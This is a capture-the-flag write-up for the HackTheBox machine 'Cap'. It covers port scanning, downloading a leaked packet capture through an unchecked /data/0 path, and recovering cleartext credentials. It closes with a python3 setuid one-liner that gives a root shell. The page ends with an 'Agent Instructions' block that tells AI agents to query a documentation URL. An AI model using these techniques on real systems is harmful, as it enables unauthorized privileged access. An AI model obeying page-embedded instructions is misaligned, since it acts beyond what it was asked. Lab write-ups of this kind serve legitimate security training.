# Cap ## Nmap ``` nmap 10.10.10.245 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Nmap done: 1 IP address (1 host up) scanned in 141.34 seconds ``` Initially we start out checking FTP to see if anonymous log in is enabled which, unfortuantely is not the case. We next move onto Port 80 and notice we are taken to a page titled Security Dashboard. ![](/files/gN5qCuojuJ37DxGTCCmO) Preliminary checks on the user interface show we are able to view basis `netstat` information and IP addresses assigned to local interfaces on the target system. ![](/files/ozHQndSQxmLPxo2nQ5kA) We also notice that we can download packet capture `PCAP` files. ![](/files/5uVL6rUILAwrMvAMv37k) Every time we request a recapture under `/capture` the download link for the `PCAP` file increments by 1. This starts from `/data/1`. When we browse to `/data/0` we are able to download an unrequested `PCAP` file. Loading the resulting `PCAP` file into `Wireshark` we are able to view credentials for the user Nathan. ![](/files/gyhsSSHS8d0JSHwsFSWT) Which gives us FTP credentials for `nathan:Buck3tH4TF0RM3!` These same credentials can be used for SSH access. ``` ssh nathan@10.10.10.245 ``` ![](/files/BnyIAcQOSmAIMGkMCb8D) Now logged on we begin enumerating. Checking what capabilities are enabled on the target system we see Python 3 has some interesting ones set. ``` getcap -r / 2>/dev/null ``` ![](/files/h61G9qb0oCiv1PaPgNPu) The `cap+setuid_capabilty` will allow us to call a `python` command with a uid of '0' which is root. We can use these to spawn a root bash shell. ``` python3 -c 'import os;os.setuid(0);os.system("/bin/bash")' ``` ![](/files/YVhs9LgPyfBwBcri7NBn) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/cap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.